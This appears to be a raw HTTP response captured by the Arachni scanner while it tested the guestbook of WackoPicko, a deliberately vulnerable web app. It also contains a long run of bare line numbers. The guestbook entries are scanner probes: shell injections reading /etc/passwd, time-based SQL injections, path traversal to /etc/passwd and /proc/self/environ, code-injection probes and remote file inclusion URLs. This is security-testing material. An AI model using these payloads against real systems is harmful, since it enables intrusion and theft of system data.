                <p class="comment">hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
        <p> - by arachni_name </p>
                <p class="comment">hTtP://tests.arachni-scanner.com/rfi.md5.txt�</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_namehTtP://tests.arachni-scanner.com/rfi.md5.txt� </p>
                <p class="comment">1</p>
        <p> - by hTtP://tests.arachni-scanner.com/rfi.md5.txt� </p>
                <p class="comment">1</p>
        <p> - by _arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec� </p>
                <p class="comment">1</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_namehTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
                <p class="comment">_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
        <p> - by arachni_name </p>
                <p class="comment">1hTtP://tests.arachni-scanner.com/rfi.md5.txt�</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by hTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
                <p class="comment">1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
        <p> - by arachni_name </p>
                <p class="comment">1hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
        <p> - by arachni_name </p>
                <p class="comment">1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec�</p>
        <p> - by arachni_name </p>
                <p class="comment">Hi, I love your site!</p>
        <p> - by adam </p>
        



<form action="/WackoPicko/guestbook.php" method="POST">
   Name: <br>
   <input type="text" name="name" /><br>
   Comment: <br>
   <textarea id="comment-box" name="comment"></textarea> <br>
   <input type="submit" value="Submit" />
</form>


</div>
       <div class="column span-24 first last" id="footer" >
        <ul>
          <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
          <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
          <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
        </ul>
      </div>
    </div>
  </body>
</html>  
   --></p></div></div></body></html>
HTTP response body

This is the original HTTP response body.

0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
1001
1002
1003
1004
1005
1006
1007
1008
1009
1010
1011
1012
1013
1014
1015
1016
1017
1018
1019
1020
1021
1022
1023
1024
1025
1026
1027
1028
<script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"<xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/>":{"stop_at_first":false,"trace":true},"PHPSESSID":{"stop_at_first":true,"trace":false},"decslc8vmakk398sqkq9619t72":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;

/* arachni_js_namespace_code_start */  /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->

<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
        <h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
        <div class="column prepend-1 span-14 first">
          <ul class="menu">
            <li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
            <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
            <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class="current"><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
                </ul>
        </div>
        <div class="column prepend-1 span-7 first last">
          <ul class="menu top_login" >
                  <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
                </ul>
        </div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
        <div class="column prepend-17 span-7 first last" id="search_box">
          <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
            <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
            <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
          </form>
        </div>
      </div>
   
<div class="column prepend-1 span-24 first last">
<h2>Guestbook</h2>
<h4>See what people are saying about us!</h4>

        <p class="comment">1</p>
        <p> - by &quot; | /bin/cat /etc/passwd | &quot; </p>
                <p class="comment">" ; /bin/cat /etc/passwd ; "</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by  | /bin/cat /etc/passwd |  </p>
                <p class="comment">1</p>
        <p> - by  ; /bin/cat /etc/passwd ;  </p>
                <p class="comment">` /bin/cat /etc/passwd`</p>
        <p> - by arachni_name </p>
                <p class="comment">" && /bin/cat /etc/passwd && "</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by ' &amp;&amp; /bin/cat /etc/passwd &amp;&amp; ' </p>
                <p class="comment">1</p>
        <p> - by &quot; ; /bin/cat /etc/passwd ; &quot; </p>
                <p class="comment">" | /bin/cat /etc/passwd | "</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by ' | /bin/cat /etc/passwd | ' </p>
                <p class="comment">1</p>
        <p> - by &quot; &amp;&amp; /bin/cat /etc/passwd &amp;&amp; &quot; </p>
                <p class="comment">1</p>
        <p> - by ` /bin/cat /etc/passwd` </p>
                <p class="comment">' | /bin/cat /etc/passwd | '</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by &quot;;print 28763*4196403# </p>
                <p class="comment">print 28763*4196403;</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by ';print 28763*4196403# </p>
                <p class="comment">';print 28763*4196403#</p>
        <p> - by arachni_name </p>
                <p class="comment">print 28763*4196403</p>
        <p> - by arachni_name </p>
                <p class="comment">;print 28763*4196403</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by print 28763*4196403 </p>
                <p class="comment">/search.php .</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by print 28763*4196403; </p>
                <p class="comment">1</p>
        <p> - by ;print 28763*4196403 </p>
                <p class="comment">1</p>
        <p> - by arachni_name';.&quot;) </p>
                <p class="comment">1</p>
        <p> - by arachni_name';waitfor delay '0:0:4'--  </p>
                <p class="comment">1</p>
        <p> - by arachni_name' where sleep(4) #  </p>
                <p class="comment">1</p>
        <p> - by &quot;;print 28763*4196403;# </p>
                <p class="comment">;print 28763*4196403;</p>
        <p> - by arachni_name </p>
                <p class="comment">";print 28763*4196403;#</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by ;print 28763*4196403; </p>
                <p class="comment">1</p>
        <p> - by ';print 28763*4196403;# </p>
                <p class="comment">";print 28763*4196403#</p>
        <p> - by arachni_name </p>
                <p class="comment">';print 28763*4196403;#</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by /search.php . </p>
                <p class="comment">1</p>
        <p> - by /bin/cat /etc/passwd </p>
                <p class="comment">1</p>
        <p> - by  &amp;&amp; /bin/cat /etc/passwd &amp;&amp;  </p>
                <p class="comment">1</p>
        <p> - by /WackoPicko/pictures/search.php . </p>
                <p class="comment">' ; /bin/cat /etc/passwd ; '</p>
        <p> - by arachni_name </p>
                <p class="comment">' && /bin/cat /etc/passwd && '</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by ' ; /bin/cat /etc/passwd ; ' </p>
                <p class="comment"> ; /bin/cat /etc/passwd ; </p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by /pictures/search.php </p>
                <p class="comment">/bin/cat /etc/passwd</p>
        <p> - by arachni_name </p>
                <p class="comment"> && /bin/cat /etc/passwd && </p>
        <p> - by arachni_name </p>
                <p class="comment">/pictures/search.php .</p>
        <p> - by arachni_name </p>
                <p class="comment">/WackoPicko/pictures/search.php .</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by /pictures/search.php . </p>
                <p class="comment">/pictures/search.php</p>
        <p> - by arachni_name </p>
                <p class="comment">/WackoPicko/pictures/search.php</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by /search.php </p>
                <p class="comment">1</p>
        <p> - by /WackoPicko/pictures/search.php </p>
                <p class="comment"> | /bin/cat /etc/passwd | </p>
        <p> - by arachni_name </p>
                <p class="comment">/search.php</p>
        <p> - by arachni_name </p>
                <p class="comment">1'=sleep(4)='</p>
        <p> - by arachni_name </p>
                <p class="comment">1;waitfor delay '0:0:4'-- </p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_name');select pg_sleep(4); --  </p>
                <p class="comment">1;select pg_sleep(4); -- </p>
        <p> - by arachni_name </p>
                <p class="comment">1);waitfor delay '0:0:4'-- </p>
        <p> - by arachni_name </p>
                <p class="comment">1');waitfor delay '0:0:4'-- </p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_name));select pg_sleep(4); --  </p>
                <p class="comment">1" or sleep(4) # </p>
        <p> - by arachni_name </p>
                <p class="comment">1';select pg_sleep(4); -- </p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_name;waitfor delay '0:0:4'--  </p>
                <p class="comment">1</p>
        <p> - by arachni_name'=sleep(4)=' </p>
                <p class="comment">1"=sleep(4)="</p>
        <p> - by arachni_name </p>
                <p class="comment">1'));select pg_sleep(4); -- </p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_name'));select pg_sleep(4); --  </p>
                <p class="comment">1</p>
        <p> - by arachni_name&quot;=sleep(4)=&quot; </p>
                <p class="comment">1</p>
        <p> - by arachni_name';select pg_sleep(4); --  </p>
                <p class="comment">1</p>
        <p> - by arachni_name);waitfor delay '0:0:4'--  </p>
                <p class="comment">1</p>
        <p> - by arachni_name));waitfor delay '0:0:4'--  </p>
                <p class="comment">1';.")</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_name&quot;);waitfor delay '0:0:4'--  </p>
                <p class="comment">1"));waitfor delay '0:0:4'-- </p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_name);select pg_sleep(4); --  </p>
                <p class="comment">1';waitfor delay '0:0:4'-- </p>
        <p> - by arachni_name </p>
                <p class="comment">1' and sleep(4) # </p>
        <p> - by arachni_name </p>
                <p class="comment">1");waitfor delay '0:0:4'-- </p>
        <p> - by arachni_name </p>
                <p class="comment">1";waitfor delay '0:0:4'-- </p>
        <p> - by arachni_name </p>
                <p class="comment">1'));waitfor delay '0:0:4'-- </p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_name&quot;));waitfor delay '0:0:4'--  </p>
                <p class="comment">1</p>
        <p> - by arachni_name'));waitfor delay '0:0:4'--  </p>
                <p class="comment">1</p>
        <p> - by arachni_name&quot;;waitfor delay '0:0:4'--  </p>
                <p class="comment">1</p>
        <p> - by arachni_name');waitfor delay '0:0:4'--  </p>
                <p class="comment">1));select pg_sleep(4); -- </p>
        <p> - by arachni_name </p>
                <p class="comment">1));waitfor delay '0:0:4'-- </p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_name' or sleep(4) #  </p>
                <p class="comment">1</p>
        <p> - by arachni_name&quot; and sleep(4)=&quot; </p>
                <p class="comment">1' or sleep(4) # </p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_name or sleep(4) #  </p>
                <p class="comment">1</p>
        <p> - by arachni_name' and sleep(4) #  </p>
                <p class="comment">1</p>
        <p> - by arachni_name' and sleep(4)=' </p>
                <p class="comment">1' and sleep(4)='</p>
        <p> - by arachni_name </p>
                <p class="comment">1 or sleep(4) # </p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_name&quot; or sleep(4) #  </p>
                <p class="comment">1" and sleep(4)="</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_name and sleep(4) </p>
                <p class="comment">1</p>
        <p> - by arachni_name;select pg_sleep(4); --  </p>
                <p class="comment">1');select pg_sleep(4); -- </p>
        <p> - by arachni_name </p>
                <p class="comment">1' where sleep(4) # </p>
        <p> - by arachni_name </p>
                <p class="comment">1);select pg_sleep(4); -- </p>
        <p> - by arachni_name </p>
                <p class="comment">1 and sleep(4)</p>
        <p> - by arachni_name </p>
                <p class="comment">file:///../../../../../../..//etc/passwd .</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by file:///../../../../../../../..//etc/passwd </p>
                <p class="comment">file:///../../../../../../../../..//etc/passwd</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by /../../../../../../../..//etc/passwd </p>
                <p class="comment">/../../../../../../../../..//etc/passwd</p>
        <p> - by arachni_name </p>
                <p class="comment">file:///../../../../../../../../..//etc/passwd .</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by file:///../../../../../../../..//etc/passwd . </p>
                <p class="comment">1</p>
        <p> - by file:///../../../../../../../../..//etc/passwd . </p>
                <p class="comment">1</p>
        <p> - by file:///../../../../../../..//etc/passwd . </p>
                <p class="comment">/../../../../../../..//etc/passwd</p>
        <p> - by arachni_name </p>
                <p class="comment">/../../../../../../..//etc/passwd .</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by /../../../../..//etc/passwd </p>
                <p class="comment">1</p>
        <p> - by /../../../../../..//etc/passwd </p>
                <p class="comment">1</p>
        <p> - by /../../../../../../..//etc/passwd . </p>
                <p class="comment">/../../../../..//etc/passwd</p>
        <p> - by arachni_name </p>
                <p class="comment">file:///../../../../../..//etc/passwd .</p>
        <p> - by arachni_name </p>
                <p class="comment">file:///../../../../..//etc/passwd</p>
        <p> - by arachni_name </p>
                <p class="comment">file:///../../../../..//etc/passwd .</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by file:///../../../..//etc/passwd . </p>
                <p class="comment">/../../../../../..//etc/passwd .</p>
        <p> - by arachni_name </p>
                <p class="comment">file:///../../../..//etc/passwd</p>
        <p> - by arachni_name </p>
                <p class="comment">/../../../../../..//etc/passwd</p>
        <p> - by arachni_name </p>
                <p class="comment">/../../../../..//etc/passwd .</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by file:///../../../../..//etc/passwd . </p>
                <p class="comment">1</p>
        <p> - by file:///../../../..//etc/passwd </p>
                <p class="comment">1</p>
        <p> - by file:///../../../../..//etc/passwd </p>
                <p class="comment">1</p>
        <p> - by file:///../../../../../..//etc/passwd . </p>
                <p class="comment">file:///../../../..//etc/passwd .</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by /../../../../../../..//etc/passwd </p>
                <p class="comment">1</p>
        <p> - by /../../../..//etc/passwd . </p>
                <p class="comment">/../../../../../../../../..//etc/passwd .</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by file:///../../../../../../../../..//etc/passwd </p>
                <p class="comment">/../../../../../../../..//etc/passwd .</p>
        <p> - by arachni_name </p>
                <p class="comment">file:///../../../../../../../..//etc/passwd</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by file:///../../../../../..//etc/passwd </p>
                <p class="comment">file:///../../../../../../../..//etc/passwd .</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by /../../../..//etc/passwd </p>
                <p class="comment">1</p>
        <p> - by /../../../../../../../../..//etc/passwd . </p>
                <p class="comment">1</p>
        <p> - by /../../../../..//etc/passwd . </p>
                <p class="comment">1</p>
        <p> - by file:///../../../../../../..//etc/passwd </p>
                <p class="comment">1</p>
        <p> - by /../../../../../../../..//etc/passwd . </p>
                <p class="comment">1</p>
        <p> - by /../../../../../..//etc/passwd . </p>
                <p class="comment">/../../../../../../../..//etc/passwd</p>
        <p> - by arachni_name </p>
                <p class="comment">file:///../../../../../../..//etc/passwd</p>
        <p> - by arachni_name </p>
                <p class="comment">file:///../../../../../..//etc/passwd</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by /../../../../../../../../..//etc/passwd </p>
                <p class="comment">1</p>
        <p> - by file:///..//etc/passwd </p>
                <p class="comment">1</p>
        <p> - by file:///../../..//etc/passwd </p>
                <p class="comment">1</p>
        <p> - by file:///../../..//etc/passwd . </p>
                <p class="comment">file:///../../..//etc/passwd .</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by /../../..//etc/passwd </p>
                <p class="comment">/../../..//etc/passwd .</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by /../../..//etc/passwd . </p>
                <p class="comment">/../../..//etc/passwd</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by /../../../../../../../../..//proc/self/environ . </p>
                <p class="comment">1</p>
        <p> - by /../..//etc/passwd . </p>
                <p class="comment">1</p>
        <p> - by file:///../..//etc/passwd </p>
                <p class="comment">/../../../../../../../../..//proc/self/environ</p>
        <p> - by arachni_name </p>
                <p class="comment">file:///../../..//etc/passwd</p>
        <p> - by arachni_name </p>
                <p class="comment">/../..//etc/passwd .</p>
        <p> - by arachni_name </p>
                <p class="comment">/../../../..//etc/passwd .</p>
        <p> - by arachni_name </p>
                <p class="comment">/../../../..//etc/passwd</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by /../..//etc/passwd </p>
                <p class="comment">file:///../..//etc/passwd .</p>
        <p> - by arachni_name </p>
                <p class="comment">file:///../..//etc/passwd</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by file:///../../../../../../../../..//proc/self/environ . </p>
                <p class="comment">1</p>
        <p> - by file:///..//etc/passwd . </p>
                <p class="comment">/..//etc/passwd</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by /..//etc/passwd . </p>
                <p class="comment">file:///..//etc/passwd</p>
        <p> - by arachni_name </p>
                <p class="comment">file:///../../../../../../../../..//proc/self/environ .</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by file:///../../..//proc/self/environ . </p>
                <p class="comment">file:///../../../..//proc/self/environ .</p>
        <p> - by arachni_name </p>
                <p class="comment">file:///../../../../../..//proc/self/environ .</p>
        <p> - by arachni_name </p>
                <p class="comment">file:///../../../../..//proc/self/environ .</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by file:///../../../../..//proc/self/environ . </p>
                <p class="comment">1</p>
        <p> - by /../../../../../..//proc/self/environ . </p>
                <p class="comment">1</p>
        <p> - by /../../../../../..//proc/self/environ </p>
                <p class="comment">1</p>
        <p> - by file:///../../../../..//proc/self/environ </p>
                <p class="comment">/../../../../../..//proc/self/environ</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by /../../../../..//proc/self/environ </p>
                <p class="comment">file:///../../../../..//proc/self/environ</p>
        <p> - by arachni_name </p>
                <p class="comment">file:///../../../../../../..//proc/self/environ</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by /../../../../..//proc/self/environ . </p>
                <p class="comment">file:///../../../..//proc/self/environ</p>
        <p> - by arachni_name </p>
                <p class="comment">/../..//proc/self/environ .</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by /../../../..//proc/self/environ </p>
                <p class="comment">/../../../../..//proc/self/environ .</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by file:///../..//proc/self/environ . </p>
                <p class="comment">1</p>
        <p> - by file:///../../..//proc/self/environ </p>
                <p class="comment">1</p>
        <p> - by file:///../../../..//proc/self/environ </p>
                <p class="comment">file:///../../..//proc/self/environ .</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by /../../..//proc/self/environ . </p>
                <p class="comment">/../../..//proc/self/environ .</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by /../..//proc/self/environ </p>
                <p class="comment">1</p>
        <p> - by /../..//proc/self/environ . </p>
                <p class="comment">1</p>
        <p> - by file:///../../../..//proc/self/environ . </p>
                <p class="comment">file:///../../..//proc/self/environ</p>
        <p> - by arachni_name </p>
                <p class="comment">/../../../../../..//proc/self/environ .</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by file:///../../../../../..//proc/self/environ . </p>
                <p class="comment">file:///../../../../../../..//proc/self/environ .</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by file:///../../../../../../../..//proc/self/environ </p>
                <p class="comment">1</p>
        <p> - by file:///../../../../../..//proc/self/environ </p>
                <p class="comment">/../../../../../../..//proc/self/environ .</p>
        <p> - by arachni_name </p>
                <p class="comment">file:///../../../../../../../..//proc/self/environ</p>
        <p> - by arachni_name </p>
                <p class="comment">/../../../../../../../../..//proc/self/environ .</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by file:///../../../../../../../../..//proc/self/environ </p>
                <p class="comment">file:///..//etc/passwd .</p>
        <p> - by arachni_name </p>
                <p class="comment">/../..//etc/passwd</p>
        <p> - by arachni_name </p>
                <p class="comment">file:///../../../../../../../../..//proc/self/environ</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by /..//etc/passwd </p>
                <p class="comment">1</p>
        <p> - by file:///../..//etc/passwd . </p>
                <p class="comment">1</p>
        <p> - by /../../../../../../../../..//proc/self/environ </p>
                <p class="comment">1</p>
        <p> - by /../../../../../../..//proc/self/environ </p>
                <p class="comment">/../../../../..//proc/self/environ</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by /../../../../../../..//proc/self/environ . </p>
                <p class="comment">/../../../../../../..//proc/self/environ</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by file:///../../../../../../../..//proc/self/environ . </p>
                <p class="comment">file:///../../../../../..//proc/self/environ</p>
        <p> - by arachni_name </p>
                <p class="comment">/../../../../../../../..//proc/self/environ</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by /../../../../../../../..//proc/self/environ . </p>
                <p class="comment">/../../../..//proc/self/environ .</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by file:///../../../../../../..//proc/self/environ . </p>
                <p class="comment">/../../../../../../../..//proc/self/environ .</p>
        <p> - by arachni_name </p>
                <p class="comment">file:///../../../../../../../..//proc/self/environ .</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by file:///../../../../../../..//proc/self/environ </p>
                <p class="comment">1</p>
        <p> - by /../../../../../../../..//proc/self/environ </p>
                <p class="comment">/..//etc/passwd .</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by /../../../..//proc/self/environ . </p>
                <p class="comment">/../..//proc/self/environ</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by file:///../..//proc/self/environ </p>
                <p class="comment">1</p>
        <p> - by file:///..//proc/self/environ . </p>
                <p class="comment">/../../..//proc/self/environ</p>
        <p> - by arachni_name </p>
                <p class="comment">/..//proc/self/environ</p>
        <p> - by arachni_name </p>
                <p class="comment">" ; sleep 4 ; "</p>
        <p> - by arachni_name </p>
                <p class="comment">` sleep 4`</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by &quot; ; sleep 4 ; &quot; </p>
                <p class="comment">1</p>
        <p> - by file:///..//proc/self/environ </p>
                <p class="comment">file:///..//proc/self/environ .</p>
        <p> - by arachni_name </p>
                <p class="comment">file:///../..//proc/self/environ .</p>
        <p> - by arachni_name </p>
                <p class="comment">/..//proc/self/environ .</p>
        <p> - by arachni_name </p>
                <p class="comment">/../../../..//proc/self/environ</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by /../../..//proc/self/environ </p>
                <p class="comment">file:///../..//proc/self/environ</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by /..//proc/self/environ </p>
                <p class="comment">1</p>
        <p> - by /..//proc/self/environ . </p>
                <p class="comment">file:///..//proc/self/environ</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by ;import time;time.sleep(4000/1000); </p>
                <p class="comment">";sleep(4000/1000);#</p>
        <p> - by arachni_name </p>
                <p class="comment">file:///proc/self/environ</p>
        <p> - by arachni_name </p>
                <p class="comment">;sleep(4000/1000);</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by &quot;;sleep(4000/1000);# </p>
                <p class="comment">1</p>
        <p> - by php://input </p>
                <p class="comment">1</p>
        <p> - by ';sleep(4000/1000);# </p>
                <p class="comment"> import time;time.sleep(4000/1000);</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by  import time;time.sleep(4000/1000); </p>
                <p class="comment">;import time;time.sleep(4000/1000);</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by file:///proc/self/environ . </p>
                <p class="comment">";import time;time.sleep(4000/1000);#</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by php://input . </p>
                <p class="comment">1</p>
        <p> - by ';import time;time.sleep(4000/1000);# </p>
                <p class="comment">php://input .</p>
